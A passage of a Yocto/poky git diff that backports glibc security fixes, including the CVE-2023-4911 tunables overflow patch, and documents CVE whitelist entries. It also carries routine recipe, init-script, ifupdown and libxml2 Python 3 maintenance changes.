++ if (nss_next_action (nip, status) == NSS_ACTION_MERGE)
++ do_merge = true;
++
+ if (nip->next == NULL)
+ no_more = -1;
+ else
+@@ -930,7 +969,7 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ }
+
+ process_list:
+- if (at->family == AF_UNSPEC)
++ if (at == NULL)
+ {
+ result = -EAI_NONAME;
+ goto free_and_return;
+--
+2.39.3
diff --git a/meta/recipes-core/glibc/glibc/CVE-2023-4911.patch b/meta/recipes-core/glibc/glibc/CVE-2023-4911.patch
new file mode 100644
index 0000000000..4d3146509a
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2023-4911.patch
@@ -0,0 +1,63 @@
+From d2b77337f734fcacdfc8e0ddec14cf31a746c7be Mon Sep 17 00:00:00 2001
+From: Siddhesh Poyarekar <siddhesh@redhat.com>
+Date: Mon, 11 Sep 2023 18:53:15 -0400
+Subject: [PATCH v2] tunables: Terminate immediately if end of input is reached
+
+The string parsing routine may end up writing beyond bounds of tunestr
+if the input tunable string is malformed, of the form name=name=val.
+This gets processed twice, first as name=name=val and next as name=val,
+resulting in tunestr being name=name=val:name=val, thus overflowing
+tunestr.
+
+Terminate the parsing loop at the first instance itself so that tunestr
+does not overflow.
+---
+Changes from v1:
+
+- Also null-terminate tunestr before exiting.
+
+ elf/dl-tunables.c | 17 ++++++++++-------
+ 1 file changed, 10 insertions(+), 7 deletions(-)
+
+Upstream-Status: Backport [git://sourceware.org/git/glibc.git]
+CVE: CVE-2023-4911
+
+diff --git a/elf/dl-tunables.c b/elf/dl-tunables.c
+index 8e7ee9df10..76cf8b9da3 100644
+--- a/elf/dl-tunables.c
++++ b/elf/dl-tunables.c
+@@ -187,11 +187,7 @@ parse_tunables (char *tunestr, char *valstring)
+ /* If we reach the end of the string before getting a valid name-value
+ pair, bail out. */
+ if (p[len] == '\0')
+- {
+- if (__libc_enable_secure)
+- tunestr[off] = '\0';
+- return;
+- }
++ break;
+
+ /* We did not find a valid name-value pair before encountering the
+ colon. */
+@@ -251,9 +247,16 @@ parse_tunables (char *tunestr, char *valstring)
+ }
+ }
+
+- if (p[len] != '\0')
+- p += len + 1;
++ /* We reached the end while processing the tunable string. */
++ if (p[len] == '\0')
++ break;
++
++ p += len + 1;
+ }
++
++ /* Terminate tunestr before we leave. */
++ if (__libc_enable_secure)
++ tunestr[off] = '\0';
+ }
+ #endif
+
+--
+2.41.0
+
diff --git a/meta/recipes-core/glibc/glibc/check-test-wrapper b/meta/recipes-core/glibc/glibc/check-test-wrapper
index f8e04e02d2..5cc993f718 100644
--- a/meta/recipes-core/glibc/glibc/check-test-wrapper
+++ b/meta/recipes-core/glibc/glibc/check-test-wrapper
@@ -2,6 +2,7 @@
import sys
import os
import subprocess
+import resource
env = os.environ.copy()
args = sys.argv[1:]
@@ -44,12 +45,20 @@ if targettype == "user":
qemuargs += ["-L", sysroot]
qemuargs += ["-E", "LD_LIBRARY_PATH={}".format(":".join(libpaths))]
command = qemuargs + args
+
+ # We've seen qemu-arm using up all system memory for some glibc
+ # tests e.g. nptl/tst-pthread-timedlock-lockloop
+ # Cap at 8GB since no test should need more than that
+ # (5GB adds 7 failures for qemuarm glibc test run)
+ limit = 8*1024*1024*1024
+ resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
+
elif targettype == "ssh":
host = os.environ.get("SSH_HOST", None)
user = os.environ.get("SSH_HOST_USER", None)
port = os.environ.get("SSH_HOST_PORT", None)
- command = ["ssh", "-o", "UserKnownHostsFile=/dev/null", "-o", "StrictHostKeyChecking=no"]
+ command = ["ssh", "-o", "UserKnownHostsFile=/dev/null", "-o", "StrictHostKeyChecking=no", "-o", "LogLevel=quiet"]
if port:
command += ["-p", str(port)]
if not host:
diff --git a/meta/recipes-core/glibc/glibc_2.31.bb b/meta/recipes-core/glibc/glibc_2.31.bb
index 3d486fbb59..296c892994 100644
--- a/meta/recipes-core/glibc/glibc_2.31.bb
+++ b/meta/recipes-core/glibc/glibc_2.31.bb
@@ -1,7 +1,40 @@
require glibc.inc
require glibc-version.inc
-CVE_CHECK_WHITELIST += "CVE-2020-10029 CVE-2020-6096 CVE-2016-10228 CVE-2020-1751 CVE-2020-1752"
+CVE_CHECK_WHITELIST += "CVE-2020-10029 CVE-2020-6096 CVE-2016-10228 CVE-2020-1751 CVE-2020-1752 \
+ CVE-2021-27645 CVE-2021-3326 CVE-2020-27618 CVE-2020-29562 CVE-2019-25013 \
+ CVE-2022-23218 CVE-2022-23219 \
+"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010022
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010023
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010024
+# Upstream glibc maintainers dispute there is any issue and have no plans to address it further.
+# "this is being treated as a non-security bug and no real threat."
+CVE_CHECK_WHITELIST += "CVE-2019-1010022 CVE-2019-1010023 CVE-2019-1010024"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010025
+# Allows for ASLR bypass so can bypass some hardening, not an exploit in itself, may allow
+# easier access for another. "ASLR bypass itself is not a vulnerability."
+# Potential patch at https://sourceware.org/bugzilla/show_bug.cgi?id=22853
+CVE_CHECK_WHITELIST += "CVE-2019-1010025"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35942
+# The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash
+# or read arbitrary memory in parse_param (in posix/wordexp.c) when called with
+# an untrusted, crafted pattern, potentially resulting in a denial of service
+# or disclosure of information. Patch was backported to 2.31 branch already:
+# https://sourceware.org/git/?p=glibc.git;a=commit;h=4f0a61f75385c9a5879cbe7202042e88f692a3c8
+# which is already included in the dunfell branch of poky:
+# https://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?h=dunfell&id=e1e89ff7d75c3d2223f9e3bd875b9b0c5e15836b
+CVE_CHECK_WHITELIST += "CVE-2021-35942"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-4527
+# This vulnerability was introduced in 2.36 by commit
+# f282cdbe7f436c75864e5640a409a10485e9abb2 resolv: Implement no-aaaa stub resolver option
+# so our version is not yet vulnerable
+# See https://sourceware.org/bugzilla/show_bug.cgi?id=30842
+CVE_CHECK_WHITELIST += "CVE-2023-4527"
DEPENDS += "gperf-native bison-native make-native"
@@ -41,6 +74,21 @@ SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \
file://0027-intl-Emit-no-lines-in-bison-generated-files.patch \
file://0028-inject-file-assembly-directives.patch \
file://0029-locale-prevent-maybe-uninitialized-errors-with-Os-BZ.patch \
+ file://CVE-2020-29573.patch \
+ file://CVE-2021-33574_1.patch \
+ file://CVE-2021-33574_2.patch \
+ file://CVE-2021-38604.patch \
+ file://0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch \
+ file://0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch \
+ file://0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch \
+ file://0033-elf-Add-test-case-for-BZ-19329.patch \
+ file://0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch \
+ file://0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch \
+ file://0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch \
+ file://0037-Avoid-deadlock-between-pthread_create-and-ctors.patch \
+ file://CVE-2023-0687.patch \
+ file://CVE-2023-4911.patch \
+ file://CVE-2023-4813.patch \
"
S = "${WORKDIR}/git"
B = "${WORKDIR}/build-${TARGET_SYS}"
diff --git a/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch b/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
index 52986e61c7..d1835c7a10 100644
--- a/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
+++ b/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
@@ -400,7 +400,7 @@ Index: ldconfig-native-2.12.1/ldconfig.c
return 0;
}
-+#define REPORT_BUGS_TO "mailing list : poky@yoctoproject.org"
++#define REPORT_BUGS_TO "mailing list : poky@lists.yoctoproject.org"
/* Print bug-reporting information in the help message. */
static char *
more_help (int key, const char *text, void *input)
diff --git a/meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch b/meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch
new file mode 100644
index 0000000000..e374d8ca59
--- /dev/null
+++ b/meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch
@@ -0,0 +1,65 @@
+From e2263b58d7733835355d7b46c3caa96d911a4717 Mon Sep 17 00:00:00 2001
+From: Simon Schwarz <simon.schwarz@infoteam.de>
+Date: Fri, 6 Nov 2020 08:53:20 +0100
+Subject: [PATCH] inet6.defn: Added -1 option to dhclient on upping an
+ interface
+
+This prevents hangs on startup when no server is available and dhcpv6 is used
+
+Upstream-Status: Pending
+
+Signed-off-by: Simon Schwarz <simon.schwarz@infoteam.de>
+Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
+---
+ inet6.defn | 12 ++++++------
+ 1 file changed, 6 insertions(+), 6 deletions(-)
+
+diff --git a/inet6.defn b/inet6.defn
+index 73dce24..25022e3 100644
+--- a/inet6.defn
++++ b/inet6.defn
+@@ -29,9 +29,9 @@ method auto
+ if (var_set("accept_ra", ifd) && !var_true("accept_ra", ifd))
+ /sbin/ip link set dev %iface% up
+ /lib/ifupdown/wait-for-ll6.sh if (var_true("dhcp", ifd) && execable("/lib/ifupdown/wait-for-ll6.sh"))
+- /sbin/dhclient -6 -v -P -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -v -P -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ if (var_true("dhcp", ifd) && execable("/sbin/dhclient") && var_true("request_prefix", ifd))
+- /sbin/dhclient -6 -v -S -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -v -S -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ elsif (var_true("dhcp", ifd) && execable("/sbin/dhclient"))
+ echo 'No DHCPv6 client software found!' >&2; false \
+ elsif (var_true("dhcp", ifd))
+@@ -154,9 +154,9 @@ method dhcp
+ if (var_set("accept_ra", ifd) && !var_true("accept_ra", ifd))
+ /sbin/ip link set dev %iface% [[address %hwaddress%]] up
+ /lib/ifupdown/wait-for-ll6.sh if (execable("/lib/ifupdown/wait-for-ll6.sh"))
+- /sbin/dhclient -6 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -P -N -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -P -N -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ if (execable("/sbin/dhclient") && var_true("request_prefix", ifd))
+- /sbin/dhclient -6 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ elsif (execable("/sbin/dhclient"))
+ echo 'No DHCPv6 client software found!' >&2; false \
+ elsif (1)
+@@ -325,7 +325,7 @@ method dhcp
+
+ up
+ /sbin/ifconfig %iface% [[link %hwaddress%]] up
+- /sbin/dhclient -6 -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ if (execable("/sbin/dhclient"))
+ echo 'No DHCPv6 client software found!' >&2; false \
+ elsif (1)
+@@ -397,7 +397,7 @@ method dhcp
+ up
+ [[Warning: Option hwaddress: %hwaddress% not yet supported]]
+ inetutils-ifconfig --interface %iface% --up
+- /sbin/dhclient -6 -pf /run/dhclient6.%iface///.%.pid -lf /var/lib/dhcp/dhclient6.%iface///.%.leases -I -df /var/lib/dhcp/dhclient.%iface///.%.leases %iface% \
++ /sbin/dhclient -6 -1 -pf /run/dhclient6.%iface///.%.pid -lf /var/lib/dhcp/dhclient6.%iface///.%.leases -I -df /var/lib/dhcp/dhclient.%iface///.%.leases %iface% \
+ if (execable("/sbin/dhclient"))
+ echo 'No DHCPv6 client software found!' >&2; false \
+ elsif (1)
+--
+2.17.1
+
diff --git a/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb b/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb
index 53cb971d33..c3681defdc 100644
--- a/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb
+++ b/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb
@@ -1,4 +1,5 @@
SUMMARY = "ifupdown: basic ifup and ifdown used by initscripts"
+HOMEPAGE = "https://salsa.debian.org/debian/ifupdown"
DESCRIPTION = "High level tools to configure network interfaces \
This package provides the tools ifup and ifdown which may be used to \
configure (or, respectively, deconfigure) network interfaces, based on \
@@ -6,11 +7,12 @@ the file /etc/network/interfaces."
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
-SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https \
+SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https;branch=master \
file://defn2-c-man-don-t-rely-on-dpkg-architecture-to-set-a.patch \
file://99_network \
file://0001-Define-FNM_EXTMATCH-for-musl.patch \
file://0001-Makefile-do-not-use-dpkg-for-determining-OS-type.patch \
+ file://0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch \
file://run-ptest \
${@bb.utils.contains('DISTRO_FEATURES', 'ptest', 'file://tweak-ptest-script.patch', '', d)} \
"
diff --git a/meta/recipes-core/images/build-appliance-image_15.0.0.bb b/meta/recipes-core/images/build-appliance-image_15.0.0.bb
index 4f935be730..035312f4d9 100644
--- a/meta/recipes-core/images/build-appliance-image_15.0.0.bb
+++ b/meta/recipes-core/images/build-appliance-image_15.0.0.bb
@@ -22,9 +22,9 @@ APPEND += "rootfstype=ext4 quiet"
DEPENDS = "zip-native python3-pip-native"
IMAGE_FSTYPES = "wic.vmdk"
-inherit core-image module-base setuptools3
+inherit core-image setuptools3
-SRCREV ?= "5ad59495782e8dbcb2b9d18e27ca4bde131465b4"
+SRCREV ?= "77442211926cbe93d60108f6df4abda3bc06b735"
SRC_URI = "git://git.yoctoproject.org/poky;branch=dunfell \
file://Yocto_Build_Appliance.vmx \
file://Yocto_Build_Appliance.vmxf \
@@ -61,12 +61,6 @@ fakeroot do_populate_poky_src () {
# Place the README_VirtualBox_Toaster file in builders home folder.
cp ${WORKDIR}/README_VirtualBox_Toaster.txt ${IMAGE_ROOTFS}/home/builder/
- # Create a symlink, needed for out-of-tree kernel modules build
- if [ ! -e ${IMAGE_ROOTFS}/lib/modules/${KERNEL_VERSION}/build ]; then
- rm -f ${IMAGE_ROOTFS}/lib/modules/${KERNEL_VERSION}/build
- lnr ${IMAGE_ROOTFS}${KERNEL_SRC_PATH} ${IMAGE_ROOTFS}/lib/modules/${KERNEL_VERSION}/build
- fi
-
echo "INHERIT += \"rm_work\"" >> ${IMAGE_ROOTFS}/home/builder/poky/build/conf/auto.conf
echo "export LC_ALL=en_US.utf8" >> ${IMAGE_ROOTFS}/home/builder/.bashrc
diff --git a/meta/recipes-core/initrdscripts/files/init-install-efi.sh b/meta/recipes-core/initrdscripts/files/init-install-efi.sh
index b6855b5aac..f667518b89 100644
--- a/meta/recipes-core/initrdscripts/files/init-install-efi.sh
+++ b/meta/recipes-core/initrdscripts/files/init-install-efi.sh
@@ -279,6 +279,11 @@ fi
umount /tgt_root
+# copy any extra files needed for ESP
+if [ -d /run/media/$1/esp ]; then
+ cp -r /run/media/$1/esp/* /boot
+fi
+
# Copy kernel artifacts. To add more artifacts just add to types
# For now just support kernel types already being used by something in OE-core
for types in bzImage zImage vmlinux vmlinuz fitImage; do
diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/finish b/meta/recipes-core/initrdscripts/initramfs-framework/finish
index 717383ebac..dee3ab3387 100755
--- a/meta/recipes-core/initrdscripts/initramfs-framework/finish
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/finish
@@ -14,6 +14,15 @@ finish_run() {
info "Switching root to '$ROOTFS_DIR'..."
+ debug "Moving basic mounts onto rootfs"
+ for dir in `awk '/\/dev.* \/run\/media/{print $2}' /proc/mounts`; do
+ # Parse any OCT or HEX encoded chars such as spaces
+ # in the mount points to actual ASCII chars
+ dir=`printf $dir`
+ mkdir -p "${ROOTFS_DIR}/media/${dir##*/}"
+ mount -n --move "$dir" "${ROOTFS_DIR}/media/${dir##*/}"
+ done
+
debug "Moving /dev, /proc and /sys onto rootfs..."
mount --move /dev $ROOTFS_DIR/dev
mount --move /proc $ROOTFS_DIR/proc
diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/rootfs b/meta/recipes-core/initrdscripts/initramfs-framework/rootfs
index 748c9391c0..1d8a0ae66d 100644
--- a/meta/recipes-core/initrdscripts/initramfs-framework/rootfs
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/rootfs
@@ -67,8 +67,8 @@ rootfs_run() {
# It is unlikely to change, but keep trying anyway.
# Perhaps we pick a different device next time.
umount $ROOTFS_DIR
- fi
fi
+ fi
fi
debug "Sleeping for $delay second(s) to wait root to settle..."
sleep $delay
diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/setup-live b/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
index 4c79f41285..7e92f93322 100644
--- a/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
@@ -1,4 +1,4 @@
-#/bin/sh
+#!/bin/sh
# Copyright (C) 2011 O.S. Systems Software LTDA.
# Licensed on MIT
diff --git a/meta/recipes-core/initscripts/initscripts-1.0/checkroot.sh b/meta/recipes-core/initscripts/initscripts-1.0/checkroot.sh
index 02f0351fcb..a63e71b780 100755
--- a/meta/recipes-core/initscripts/initscripts-1.0/checkroot.sh
+++ b/meta/recipes-core/initscripts/initscripts-1.0/checkroot.sh
@@ -74,7 +74,7 @@ test "$VERBOSE" != no && echo "Activating swap"
#
# Check the root filesystem.
#
-if test -f /fastboot || test $rootcheck = no
+if test -f /fastboot || test "$rootcheck" = "no"
then
test $rootcheck = yes && echo "Fast boot, no filesystem check"
else
diff --git a/meta/recipes-core/initscripts/initscripts_1.0.bb b/meta/recipes-core/initscripts/initscripts_1.0.bb
index f98e42eb2e..cb5417cc39 100644
--- a/meta/recipes-core/initscripts/initscripts_1.0.bb
+++ b/meta/recipes-core/initscripts/initscripts_1.0.bb
@@ -129,7 +129,7 @@ do_install () {
update-rc.d -r ${D} rmnologin.sh start 99 2 3 4 5 .
update-rc.d -r ${D} sendsigs start 20 0 6 .
update-rc.d -r ${D} urandom start 38 S 0 6 .
- update-rc.d -r ${D} umountnfs.sh start 31 0 1 6 .
+ update-rc.d -r ${D} umountnfs.sh stop 31 0 1 6 .
update-rc.d -r ${D} umountfs start 40 0 6 .
update-rc.d -r ${D} reboot start 90 6 .
update-rc.d -r ${D} halt start 90 0 .
diff --git a/meta/recipes-core/kbd/kbd_2.2.0.bb b/meta/recipes-core/kbd/kbd_2.2.0.bb
index e5700ff57f..d10c93dfb7 100644
--- a/meta/recipes-core/kbd/kbd_2.2.0.bb
+++ b/meta/recipes-core/kbd/kbd_2.2.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "Keytable files and keyboard utilities"
HOMEPAGE = "http://www.kbd-project.org/"
+DESCRIPTION = "The kbd project contains tools for managing Linux console (Linux console, virtual terminals, keyboard, etc.) – mainly, what they do is loading console fonts and keyboard maps."
# everything minus console-fonts is GPLv2+
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=892f569a555ba9c07a568a7c0c4fa63a"
diff --git a/meta/recipes-core/libxcrypt/libxcrypt.inc b/meta/recipes-core/libxcrypt/libxcrypt.inc
index 2d2a0b03e3..b6bf48ba79 100644
--- a/meta/recipes-core/libxcrypt/libxcrypt.inc
+++ b/meta/recipes-core/libxcrypt/libxcrypt.inc
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM ?= "file://LICENSING;md5=3bb6614cf5880cbf1b9dbd9e3d145e2c \
inherit autotools pkgconfig
-SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH}"
+SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH};protocol=https"
SRCREV = "823437d015cd4ab4d100ed205f218681b03ae45c"
SRCBRANCH ?= "develop"
diff --git a/meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch b/meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch
new file mode 100644
index 0000000000..b0d26d1c08
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch
@@ -0,0 +1,813 @@
+From b5125000917810731bc28055c0445d571121f80e Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Thu, 21 Apr 2022 00:45:58 +0200
+Subject: [PATCH] Port gentest.py to Python 3
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/343fc1421cdae097fa6c4cffeb1a065a40be6bbb]
+
+* fixes:
+
+make[1]: 'testReader' is up to date.
+ File "../libxml2-2.9.10/gentest.py", line 11
+ print "libxml2 python bindings not available, skipping testapi.c generation"
+ ^
+SyntaxError: Missing parentheses in call to 'print'. Did you mean print("libxml2 python bindings not available, skipping testapi.c generation")?
+make[1]: [Makefile:2078: testapi.c] Error 1 (ignored)
+
+...
+
+make[1]: 'testReader' is up to date.
+ File "../libxml2-2.9.10/gentest.py", line 271
+ return 1
+ ^
+TabError: inconsistent use of tabs and spaces in indentation
+make[1]: [Makefile:2078: testapi.c] Error 1 (ignored)
+
+...
+
+aarch64-oe-linux-gcc: error: testapi.c: No such file or directory
+aarch64-oe-linux-gcc: fatal error: no input files
+compilation terminated.
+make[1]: *** [Makefile:1275: testapi.o] Error 1
+
+But there is still a bit mystery why it worked before, because check-am
+calls gentest.py with $(PYTHON), so it ignores the shebang in the script
+and libxml2 is using python3native (through python3targetconfig.bbclass)
+so something like:
+
+libxml2/2.9.10-r0/recipe-sysroot-native/usr/bin/python3-native/python3 gentest.py
+
+But that still fails (now without SyntaxError) with:
+libxml2 python bindings not available, skipping testapi.c generation
+
+because we don't have dependency on libxml2-native (to provide libxml2
+python bindings form python3native) and exported PYTHON_SITE_PACKAGES
+might be useless (e.g. /usr/lib/python3.8/site-packages on Ubuntu-22.10
+which uses python 3.10 and there is no site-packages with libxml2)
+
+Signed-off-by: Martin Jansa <Martin.Jansa@gmail.com>
+---
+ gentest.py | 421 ++++++++++++++++++++++++++---------------------------
+ 1 file changed, 209 insertions(+), 212 deletions(-)
+
+diff --git a/gentest.py b/gentest.py
+index b763300..0756706 100755
+--- a/gentest.py
++++ b/gentest.py
+@@ -8,7 +8,7 @@ import string
+ try:
+ import libxml2
+ except:
+- print "libxml2 python bindings not available, skipping testapi.c generation"
++ print("libxml2 python bindings not available, skipping testapi.c generation")
+ sys.exit(0)
+
+ if len(sys.argv) > 1:
+@@ -227,7 +227,7 @@ extra_post_call = {
+ if (old != NULL) {
+ xmlUnlinkNode(old);
+ xmlFreeNode(old) ; old = NULL ; }
+- ret_val = NULL;""",
++\t ret_val = NULL;""",
+ "xmlTextMerge":
+ """if ((first != NULL) && (first->type != XML_TEXT_NODE)) {
+ xmlUnlinkNode(second);
+@@ -236,7 +236,7 @@ extra_post_call = {
+ """if ((ret_val != NULL) && (ret_val != ncname) &&
+ (ret_val != prefix) && (ret_val != memory))
+ xmlFree(ret_val);
+- ret_val = NULL;""",
++\t ret_val = NULL;""",
+ "xmlNewDocElementContent":
+ """xmlFreeDocElementContent(doc, ret_val); ret_val = NULL;""",
+ "xmlDictReference": "xmlDictFree(dict);",
+@@ -268,29 +268,29 @@ modules = []
+ def is_skipped_module(name):
+ for mod in skipped_modules:
+ if mod == name:
+- return 1
++ return 1
+ return 0
+
+ def is_skipped_function(name):
+ for fun in skipped_functions:
+ if fun == name:
+- return 1
++ return 1
+ # Do not test destructors
+- if string.find(name, 'Free') != -1:
++ if name.find('Free') != -1:
+ return 1
+ return 0
+
+ def is_skipped_memcheck(name):
+ for fun in skipped_memcheck:
+ if fun == name:
+- return 1
++ return 1
+ return 0
+
+ missing_types = {}
+ def add_missing_type(name, func):
+ try:
+ list = missing_types[name]
+- list.append(func)
++ list.append(func)
+ except:
+ missing_types[name] = [func]
+
+@@ -310,7 +310,7 @@ def add_missing_functions(name, module):
+ missing_functions_nr = missing_functions_nr + 1
+ try:
+ list = missing_functions[module]
+- list.append(name)
++ list.append(name)
+ except:
+ missing_functions[module] = [name]
+
+@@ -319,45 +319,45 @@ def add_missing_functions(name, module):
+ #
+
+ def type_convert(str, name, info, module, function, pos):
+-# res = string.replace(str, " ", " ")
+-# res = string.replace(str, " ", " ")
+-# res = string.replace(str, " ", " ")
+- res = string.replace(str, " *", "_ptr")
+-# res = string.replace(str, "*", "_ptr")
+- res = string.replace(res, " ", "_")
++# res = str.replace(" ", " ")
++# res = str.replace(" ", " ")
++# res = str.replace(" ", " ")
++ res = str.replace(" *", "_ptr")
++# res = str.replace("*", "_ptr")
++ res = res.replace(" ", "_")
+ if res == 'const_char_ptr':
+- if string.find(name, "file") != -1 or \
+- string.find(name, "uri") != -1 or \
+- string.find(name, "URI") != -1 or \
+- string.find(info, "filename") != -1 or \
+- string.find(info, "URI") != -1 or \
+- string.find(info, "URL") != -1:
+- if string.find(function, "Save") != -1 or \
+- string.find(function, "Create") != -1 or \
+- string.find(function, "Write") != -1 or \
+- string.find(function, "Fetch") != -1:
+- return('fileoutput')
+- return('filepath')
++ if name.find("file") != -1 or \
++ name.find("uri") != -1 or \
++ name.find("URI") != -1 or \
++ info.find("filename") != -1 or \
++ info.find("URI") != -1 or \
++ info.find("URL") != -1:
++ if function.find("Save") != -1 or \
++ function.find("Create") != -1 or \
++ function.find("Write") != -1 or \
++ function.find("Fetch") != -1:
++ return('fileoutput')
++ return('filepath')
+ if res == 'void_ptr':
+ if module == 'nanoftp' and name == 'ctx':
+- return('xmlNanoFTPCtxtPtr')
++ return('xmlNanoFTPCtxtPtr')
+ if function == 'xmlNanoFTPNewCtxt' or \
+- function == 'xmlNanoFTPConnectTo' or \
+- function == 'xmlNanoFTPOpen':
+- return('xmlNanoFTPCtxtPtr')
++ function == 'xmlNanoFTPConnectTo' or \
++ function == 'xmlNanoFTPOpen':
++ return('xmlNanoFTPCtxtPtr')
+ if module == 'nanohttp' and name == 'ctx':
+- return('xmlNanoHTTPCtxtPtr')
+- if function == 'xmlNanoHTTPMethod' or \
+- function == 'xmlNanoHTTPMethodRedir' or \
+- function == 'xmlNanoHTTPOpen' or \
+- function == 'xmlNanoHTTPOpenRedir':
+- return('xmlNanoHTTPCtxtPtr');
++ return('xmlNanoHTTPCtxtPtr')
++ if function == 'xmlNanoHTTPMethod' or \
++ function == 'xmlNanoHTTPMethodRedir' or \
++ function == 'xmlNanoHTTPOpen' or \
++ function == 'xmlNanoHTTPOpenRedir':
++ return('xmlNanoHTTPCtxtPtr');
+ if function == 'xmlIOHTTPOpen':
+- return('xmlNanoHTTPCtxtPtr')
+- if string.find(name, "data") != -1:
+- return('userdata')
+- if string.find(name, "user") != -1:
+- return('userdata')
++ return('xmlNanoHTTPCtxtPtr')
++ if name.find("data") != -1:
++ return('userdata')
++ if name.find("user") != -1:
++ return('userdata')
+ if res == 'xmlDoc_ptr':
+ res = 'xmlDocPtr'
+ if res == 'xmlNode_ptr':
+@@ -366,18 +366,18 @@ def type_convert(str, name, info, module, function, pos):
+ res = 'xmlDictPtr'
+ if res == 'xmlNodePtr' and pos != 0:
+ if (function == 'xmlAddChild' and pos == 2) or \
+- (function == 'xmlAddChildList' and pos == 2) or \
++ (function == 'xmlAddChildList' and pos == 2) or \
+ (function == 'xmlAddNextSibling' and pos == 2) or \
+ (function == 'xmlAddSibling' and pos == 2) or \
+ (function == 'xmlDocSetRootElement' and pos == 2) or \
+ (function == 'xmlReplaceNode' and pos == 2) or \
+ (function == 'xmlTextMerge') or \
+- (function == 'xmlAddPrevSibling' and pos == 2):
+- return('xmlNodePtr_in');
++ (function == 'xmlAddPrevSibling' and pos == 2):
++ return('xmlNodePtr_in');
+ if res == 'const xmlBufferPtr':
+ res = 'xmlBufferPtr'
+ if res == 'xmlChar_ptr' and name == 'name' and \
+- string.find(function, "EatName") != -1:
++ function.find("EatName") != -1:
